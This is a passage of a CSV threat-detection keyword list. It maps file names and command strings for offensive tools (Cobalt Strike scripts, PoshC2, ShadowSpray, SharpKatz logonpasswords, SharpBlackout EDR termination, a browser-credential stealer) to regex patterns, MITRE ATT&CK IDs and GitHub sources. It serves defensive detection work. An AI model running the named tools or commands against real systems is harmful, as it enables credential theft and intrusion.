fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ShadowSpray.exe*",".{0,1000}ShadowSpray\.exe.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","1","N/A","7","5","432","78","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" "*ShadowSpray.Kerb*",".{0,1000}ShadowSpray\.Kerb.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","7","5","432","78","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" "*ShadowSpray.Kerb.lib*",".{0,1000}ShadowSpray\.Kerb\.lib.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ShadowSpray.sln*",".{0,1000}ShadowSpray\.sln.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","1","N/A","7","5","432","78","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" "*ShadowSpray-master*",".{0,1000}ShadowSpray\-master.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","1","N/A","7","5","432","78","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" "*ShadowUser/scvhost.exe*",".{0,1000}ShadowUser\/scvhost\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","486","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*share/hiphp.py*",".{0,1000}share\/hiphp\.py.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. 
It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*share_listing/ALL_COMBINED_RESULTS.TXT*",".{0,1000}share_listing\/ALL_COMBINED_RESULTS\.TXT.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","0","N/A","9","2","162","26","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z" "*shareenum.py*",".{0,1000}shareenum\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*shareenumeration*",".{0,1000}shareenumeration.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*SharepointExploiter.ps1*",".{0,1000}SharepointExploiter\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. 
","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*SharepointSiteExploiter.ps1*",".{0,1000}SharepointSiteExploiter\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*Shares/cme_spider_plus*",".{0,1000}Shares\/cme_spider_plus.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*Shares/finduncshar_*.txt*",".{0,1000}Shares\/finduncshar_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" 
"*--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items*decrypted_cookie*",".{0,1000}\-\-Sharing\-this\-will\-allow\-someone\-to\-log\-in\-as\-you\-and\-to\-steal\-your\-ROBUX\-and\-items.{0,1000}decrypted_cookie.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*sharp ADCollector*",".{0,1000}sharp\sADCollector.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*sharp ADSearch*",".{0,1000}sharp\sADSearch.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*sharp BetterSafetyKatz*",".{0,1000}sharp\sBetterSafetyKatz.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*Sharp 
Compile*",".{0,1000}Sharp\sCompile.{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","0","N/A","10","10","290","58","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z" "*sharp init download/update SharpCollection tools*",".{0,1000}sharp\sinit\s\sdownload\/update\sSharpCollection\stools.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*sharp 
InveighZero*",".{0,1000}sharp\sInveighZero.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*sharp SharpAllowedToAct*",".{0,1000}sharp\sSharpAllowedToAct.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*sharp SharpAppLocker*",".{0,1000}sharp\sSharpAppLocker.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*sharp SharpChisel*",".{0,1000}sharp\sSharpChisel.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*sharp SharpChromium*",".{0,1000}sharp\sSharpChromium.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*sharp SharpCrashEventLog *",".{0,1000}sharp\sSharpCrashEventLog\s.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 
- TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*sharp SharpKatz --Command logonpasswords*",".{0,1000}sharp\sSharpKatz\s\-\-Command\slogonpasswords.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*sharp SharpMiniDump*",".{0,1000}sharp\sSharpMiniDump.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*sharp Sharp-SMBExec *",".{0,1000}sharp\sSharp\-SMBExec\s.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*sharp SharpSpray*",".{0,1000}sharp\sSharpSpray.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*sharp SharpZeroLogon*",".{0,1000}sharp\sSharpZeroLogon.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*sharp 
StickyNotesExtract*",".{0,1000}sharp\sStickyNotesExtract.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*sharp winPEAS*",".{0,1000}sharp\swinPEAS.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*sharp_collection.insert(*",".{0,1000}sharp_collection\.insert\(.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*Sharp_v4_x64*.bin*",".{0,1000}Sharp_v4_x64.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Sharp_v4_x86*.bin*",".{0,1000}Sharp_v4_x86.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework 
used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*sharpadidnsdump.*",".{0,1000}sharpadidnsdump\..{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpAdidnsdumpManager*",".{0,1000}SharpAdidnsdumpManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpAdidnsdumpMenu*",".{0,1000}SharpAdidnsdumpMenu.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpADWS 1.0.0-beta - 
Copyright*",".{0,1000}SharpADWS\s1\.0\.0\-beta\s\-\sCopyright.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "*SharpADWS.exe*",".{0,1000}SharpADWS\.exe.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","1","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "*SharpAllowedToAct.exe*",".{0,1000}SharpAllowedToAct\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*sharpapplocker*",".{0,1000}sharpapplocker.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*SharpAppLocker.exe*",".{0,1000}SharpAppLocker\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpAzbelt-main*",".{0,1000}SharpAzbelt\-main.{0,1000}","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","1","N/A","8","1","26","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" "*SharpBlackout* -p *",".{0,1000}SharpBlackout.{0,1000}\s\-p\s.{0,1000}","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","0","N/A","10","1","78","20","2023-08-23T14:44:25Z","2023-08-23T14:16:40Z" "*SharpBlackOut.csproj*",".{0,1000}SharpBlackOut\.csproj.{0,1000}","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","1","N/A","10","1","78","20","2023-08-23T14:44:25Z","2023-08-23T14:16:40Z" "*SharpBlackout.exe*",".{0,1000}SharpBlackout\.exe.{0,1000}","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - 
T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","1","N/A","10","1","78","20","2023-08-23T14:44:25Z","2023-08-23T14:16:40Z" "*SharpBlackOut.pdb*",".{0,1000}SharpBlackOut\.pdb.{0,1000}","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","1","N/A","10","1","78","20","2023-08-23T14:44:25Z","2023-08-23T14:16:40Z" "*SharpBlackOut.sln*",".{0,1000}SharpBlackOut\.sln.{0,1000}","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","1","N/A","10","1","78","20","2023-08-23T14:44:25Z","2023-08-23T14:16:40Z" "*SharpBlackout-main*",".{0,1000}SharpBlackout\-main.{0,1000}","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","1","N/A","10","1","78","20","2023-08-23T14:44:25Z","2023-08-23T14:16:40Z" "*SharpBlock -*",".{0,1000}SharpBlock\s\-.{0,1000}","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point execution","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","0","N/A","10","10","1057","150","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" "*SharpBlock.csproj*",".{0,1000}SharpBlock\.csproj.{0,1000}","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point execution","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","1","N/A","10","10","1057","150","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z"
"*SharpBlock.exe*",".{0,1000}SharpBlock\.exe.{0,1000}","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point execution","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","1","N/A","10","10","1057","150","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" "*SharpBlock.sln*",".{0,1000}SharpBlock\.sln.{0,1000}","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point execution","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","1","N/A","10","10","1057","150","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" "*SharpBuster.AssemblyInfo.cs*",".{0,1000}SharpBuster\.AssemblyInfo\.cs.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","7","1","60","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z" "*SharpBypassUAC*",".{0,1000}SharpBypassUAC.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Use SharpBypassUAC e.g. from a CobaltStrike beacon","T1550 T1555 T1212 